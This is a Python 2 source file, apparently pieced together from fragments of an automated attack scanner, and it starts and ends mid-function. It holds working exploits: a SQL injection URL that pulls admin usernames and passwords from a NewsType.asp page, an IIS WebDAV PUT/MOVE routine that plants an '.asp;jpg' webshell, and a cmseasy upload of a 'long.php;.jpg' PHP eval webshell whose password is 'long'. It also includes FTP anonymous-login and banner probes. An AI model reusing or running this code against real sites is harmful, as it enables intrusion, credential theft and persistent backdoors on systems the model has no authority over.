        literal in the EXP_list appears redacted ("******"), which is not
        valid Python as shown.
        """
        # try to log in; on success the username & password are reported

        #self.A= int(time.strftime('%H%M%S'))
        try:  # can the FTP service be reached at all?
            ftpA = FTP()  # fresh FTP client
            ftpA.connect(host, port)  # connect(server, port)
        except Exception, e:
            print e
            return 0

        try:  # anonymous account check: user "anonymous" with an empty password
            ftpA = FTP()  # fresh FTP client
            ftpA.connect(host, port)  # connect(server, port)
            ftpA.login("anonymous", "")  # attempt FTP login
            EXP_list = [
                1, host, "FTP", "user:anonymous", "password:"******"", "niming"
            ]
            # [webshell ok 0/1, URL, severity, vuln type, vuln URL, password, note] -- 7 fields
            url_exp.put(EXP_list, 0.5)  # hand the record to the shared url_exp queue
            return 0
        except Exception, e:
            pass
 def socket_80(self, url):
     """Send a raw HTTP ``OPTIONS /`` to port 80 of ``url`` and queue the ``Server:`` header line found in the reply.

     ``socket.gethostbyname`` resolves ``url``; ``self.socket_sendall``
     performs the exchange.  The first ``Server:...`` line is extracted with
     a regex -- ``sarr[0][0]`` raises IndexError when absent, which the
     bare ``except`` turns into a return of 0.  An empty header value also
     returns 0; otherwise a 7-field EXP_list is put on ``url_exp`` and a
     summary line is printed.

     NOTE(review): the request line is terminated with "\\n" rather than
     "\\r\\n" before the Host header.

     url -- host name to resolve and probe.
     Returns None on success, 0 on empty header or any exception.
     """
     try:
         port = 80
         ip = socket.gethostbyname(url)  # resolve host to IPv4
         data = "OPTIONS / HTTP/1.1\nHost:%s\r\n\r\n" % (
             ip)  # OPTIONS tends to return server banner information
         OPTIONS = self.socket_sendall(ip, port, data)
         p = re.compile(
             r'(Server:.*?)(\n)')  # capture the Server header line
         sarr = p.findall(OPTIONS)
         data = sarr[0][0]
         if data == "":
             return 0
         EXP_list = [1, url, "socket_port80", "socket_port80", data, "", ""]
         # [webshell ok 0/1, URL, severity, vuln type, vuln URL, password, note] -- 7 fields
         url_exp.put(EXP_list, 0.5)  # hand the record to the shared url_exp queue
         print "url:%s port80:%s" % (url, data)
     except:
         return 0
 def one(self, arg):
     """Fetch a crafted ``/NewsType.asp`` URL under ``arg`` and queue the first news link text if it contains a ``|`` separator.

     The page is read via ``self.open_url_data`` (0 means failure).  Link
     text after ``shownews.asp`` is captured by regex; ``sarr[0]`` raises
     IndexError when nothing matched, which the ``except`` turns into 0.
     A ``|`` in the text yields a CN_bc_nfsj_jlxt_wrtx EXP_list that is
     printed and put on ``url_exp``.

     arg -- base URL of the site.
     Returns 0 on fetch failure or exception, otherwise None.
     """
     try:
         URL = arg + "/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='"
         ss = self.open_url_data(URL)
         if ss == 0:  # page could not be read
             return 0
         p = re.compile(r'<a.+?href=\\"shownews.asp.+?>(.+?)</a></span>')
         sarr = p.findall(ss)
         if "|" in sarr[0]:
             EXP_list = [
                 1, self.url, "bc", "CN_bc_nfsj_jlxt_wrtx",
                 arg + "/NewsType.asp", sarr[0], ""
             ]
             print EXP_list
             # [webshell ok 0/1, URL, severity, vuln type, vuln URL, password, note] -- 7 fields
             url_exp.put(EXP_list, 0.5)  # hand the record to the shared url_exp queue
     except Exception, e:
         #print e
         return 0
    def IIS_webdav(self, url, port=80):  # IIS WebDAV write check
        """Probe ``url`` for WebDAV via a raw ``OPTIONS /`` and, if ``DAV`` is advertised, exercise ``self.put`` and ``self.move``.

        A raw socket sends the OPTIONS request and reads up to 1024 bytes.
        If the reply mentions ``DAV``, ``self.put(url, '/test.txt')`` is
        tried; success queues an exp_IISwebdav_put record.  A random name
        from ``self.sjzf()`` with ``.asp;jpg`` appended is then used as the
        MOVE destination; if ``self.move`` succeeds the resulting URL is
        checked with ``yijuhua_cs`` and queued with confidence 1
        (exp_IISwebdav_move) or 0 (UAS_exp_IISwebdav_move).

        NOTE(review): ``self.txt`` already starts with "/", so the
        ``"http://%s/%s"`` format produces a double slash in the recorded URL.

        url -- host name; resolved with ``socket.gethostbyname``.
        port -- TCP port, default 80.
        Returns 0 in every case; the socket is never closed.
        """
        try:
            self.txt = '/test.txt'
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            remote_ip = socket.gethostbyname(url)
            s.connect((remote_ip, port))
            message = "OPTIONS / HTTP/1.1\r\nHost: %s\r\n\r\n" % url
            s.sendall(message)
            reply = s.recv(1024)
            if 'DAV' in reply:
                # debug print removed: WebDAV advertised
                if self.put(url, self.txt):
                    data = "http://%s/%s" % (url, self.txt)
                    #print "exp_IISwebdav_put---%s---%s"%(data,"webshell--pass:long")
                    EXP_list = [
                        1, url, "exp", "exp_IISwebdav_put", data, "", ""
                    ]
                    # [webshell ok 0/1, URL, severity, vuln type, vuln URL, password, note] -- 7 fields
                    url_exp.put(EXP_list, 0.5)  # hand the record to the shared url_exp queue

                    MOVE_asp = self.sjzf()  # random file name
                    MOVE_asp += ".asp;jpg"
                    moveheaders = {
                        'User-Agent':
                        'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
                        'Destination': 'http://%s/%s' % (url.strip(), MOVE_asp)
                    }
                    if self.move(url, self.txt, moveheaders):
                        data = "http://%s/%s" % (url.strip(), MOVE_asp)
                        if yijuhua_cs("asp", data,
                                      "long"):  # args: asp|php, URL, password
                            # check passed
                            EXP_list = [
                                1, url, "exp", "exp_IISwebdav_move", data,
                                "long", "webshell"
                            ]
                            # [webshell ok 0/1, URL, severity, vuln type, vuln URL, password, note] -- 7 fields
                            #print EXP_list
                            url_exp.put(EXP_list, 0.5)  # hand the record to the shared url_exp queue
                        else:
                            # check failed
                            EXP_list = [
                                0, url, "exp", "UAS_exp_IISwebdav_move", data,
                                "long", "webshell"
                            ]
                            # [webshell ok 0/1, URL, severity, vuln type, vuln URL, password, note] -- 7 fields
                            #print EXP_list
                            url_exp.put(EXP_list, 0.5)  # hand the record to the shared url_exp queue

#                        print "exp_IISwebdav_move---%s---%s"%(data,"webshell--pass:long")
#else:
#    print 'Webdav Is No Vulnerable!'
            return 0
        except Exception, e:
            #print e
            return 0
    def scan(self, arg):
        """Check ``arg[1]/celive/live/doajaxfileupload.php`` for JPG support, upload the local ``long.php;.jpg`` and queue the stored path.

        ``self.URL_DZ`` must mention ``jpg`` before anything is sent; that
        alone queues a confidence-1 CN_exp_cmseasy_IIS6_jx_JPG record.  The
        multipart POST reply is searched for ``target=...>(name)</a>``;
        a missing match returns 0.  ``self.http_get`` verifies the stored
        path exists before ``yijuhua_cs`` decides confidence 1 or 0 for the
        CN_exp_cmseasy_IIS6_jx record.

        arg -- (url0, url1) pair; url1 must contain ``//``.
        Returns 0 when no name was found or an exception was caught,
        otherwise None.  The opened file handle is never closed.
        """
        try:
            url0, url1 = arg
            #http://www.skyscom.com/celive/live/doajaxfileupload.php
            data = "%s/celive/live/doajaxfileupload.php" % (url1)
            if 'jpg' in self.URL_DZ(data):  # does the endpoint accept JPG?
                EXP_list = [
                    1, url0, url1, "CN_exp_cmseasy_IIS6_jx_JPG", data, "", ""
                ]
                # [confidence 0/1, primary URL, secondary URL, vuln type, vuln URL, password, note] -- 7 fields
                url_exp.put(EXP_list, 0.5)  # hand the record to the shared url_exp queue
                # upload the local file
                #data="<?php @eval($_POST['long']);?>"
                files = {'fileToUpload': open('long.php;.jpg', 'rb')}
                r = requests.post(data, files=files)
                data = r.text

                name = []
                try:
                    p = re.compile(r'target=.+?>(.*?)</a>'
                                   )  # e.g. [u'CELIVE-Q7duV0tNj8.php;.jpg']
                    sarr = p.findall(data)  # expect a single match
                    name = sarr[0]
                except:
                    #print "!"
                    return 0
                #print name
                data = "%s/celive/uploadfiles/%s" % (url1, name)
                if self.http_get(
                        url1.split('//')[1],
                        "/celive/uploadfiles/" + name):  # does the stored path respond?
                    if yijuhua_cs("php", data, "long"):  # args: asp|php, URL, password
                        # check passed
                        EXP_list = [
                            1, url0, url1, "CN_exp_cmseasy_IIS6_jx", data,
                            "long", "webshell"
                        ]
                        # [confidence 0/1, primary URL, secondary URL, vuln type, vuln URL, password, note] -- 7 fields
                        #print EXP_list
                        url_exp.put(EXP_list, 0.5)  # hand the record to the shared url_exp queue
                    else:
                        # check failed
                        EXP_list = [
                            0, url0, url1, "CN_exp_cmseasy_IIS6_jx", data,
                            "long", "webshell"
                        ]
                        # [confidence 0/1, primary URL, secondary URL, vuln type, vuln URL, password, note] -- 7 fields
                        #print EXP_list
                        url_exp.put(EXP_list, 0.5)  # hand the record to the shared url_exp queue

        except Exception, e:
            #print e
            return 0
    def cmseasy_IIS6_jx(self, url):  # cmseasy upload + IIS6 parsing check
        """Single-URL variant of the cmseasy upload check: probe JPG support, upload the local ``long.php;.jpg`` and queue the stored path.

        Same flow as the (url0, url1) version: ``self.URL_DZ`` must mention
        ``jpg`` (queued here with confidence 0 as exp_cmseasy_IIS6_jx), the
        multipart POST reply is searched for ``target=...>(name)</a>``
        (no match returns 0), ``self.http_get(url[7:], ...)`` verifies the
        stored path, and ``yijuhua_cs`` decides confidence 1 or 0 for the
        CN_exp_cmseasy_IIS6_jx record.

        url -- base URL of the site; ``url[7:]`` is assumed to strip a
        "http://" prefix (TODO confirm).
        Returns 0 when no name was found or an exception was caught,
        otherwise None.  The opened file handle is never closed.
        """
        try:
            #http://www.skyscom.com/celive/live/doajaxfileupload.php
            data = "%s/celive/live/doajaxfileupload.php" % (url)
            if 'jpg' in self.URL_DZ(data):  # does the endpoint accept JPG?
                # debug print removed: JPG accepted
                EXP_list = [0, url, "exp", "exp_cmseasy_IIS6_jx", data, "", ""]
                # [webshell ok 0/1, URL, severity, vuln type, vuln URL, password, note] -- 7 fields
                url_exp.put(EXP_list, 0.5)  # hand the record to the shared url_exp queue
                # upload the local file
                #data="<?php @eval($_POST['long']);?>"
                files = {'fileToUpload': open('long.php;.jpg', 'rb')}
                r = requests.post(data, files=files)
                data = r.text

                name = []
                try:
                    p = re.compile(r'target=.+?>(.*?)</a>'
                                   )  # e.g. [u'CELIVE-Q7duV0tNj8.php;.jpg']
                    sarr = p.findall(data)  # expect a single match
                    name = sarr[0]
                except:
                    #print "!"
                    return 0
                #print name
                data = "%s/celive/uploadfiles/%s" % (url, name)
                if self.http_get(url[7:],
                                 "/celive/uploadfiles/" + name):  # does the stored path respond?
                    if yijuhua_cs("php", data, "long"):  # args: asp|php, URL, password
                        # check passed
                        EXP_list = [
                            1, url, "exp", "CN_exp_cmseasy_IIS6_jx", data,
                            "long", "webshell"
                        ]
                        # [webshell ok 0/1, URL, severity, vuln type, vuln URL, password, note] -- 7 fields
                        url_exp.put(EXP_list, 0.5)  # hand the record to the shared url_exp queue
                    else:
                        # check failed
                        EXP_list = [
                            0, url, "exp", "CN_exp_cmseasy_IIS6_jx", data,
                            "long", "webshell"
                        ]
                        # [webshell ok 0/1, URL, severity, vuln type, vuln URL, password, note] -- 7 fields
                        url_exp.put(EXP_list, 0.5)  # hand the record to the shared url_exp queue

        except Exception, e:
            #print e
            return 0
            ftpA = FTP()  #初始化FTP类
            ftpA.connect(host, port)  #连接 服务器名  端口号
        except Exception, e:
            print e
            return 0

        try:  #判断是否为匿名账户  #anonymous  密码为空属于匿名账户
            ftpA = FTP()  #初始化FTP类
            ftpA.connect(host, port)  #连接 服务器名  端口号
            ftpA.login("anonymous", "")  #连接FTP
            EXP_list = [
                1, self.openurl[0], host, "FTP", "user:anonymous:password:"******"", "niming"
            ]
            #["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个
            url_exp.put(EXP_list, 0.5)  #插入队列
            return 0
        except Exception, e:
            pass

        #print u"要扫描IP:",host,
        Adomain = host  #域名www.baidu.com
        Bdomain = self.get_sdomain(Adomain)  #域名拆解www.baidu.com->baidu.com
        Cdomain = self.get_ssdomain(Adomain)  #域名拆解www.baidu.com->baidu
        Ddomain = ""  #域名拆解www.baidu.com->wwwbaiducom
        for i, j in {'.': ''}.iteritems():  #去.符号
            Ddomain = Adomain.replace(i, j)
        ###################################
        accounts = deque()  #list数组

        #准备 用户名和密码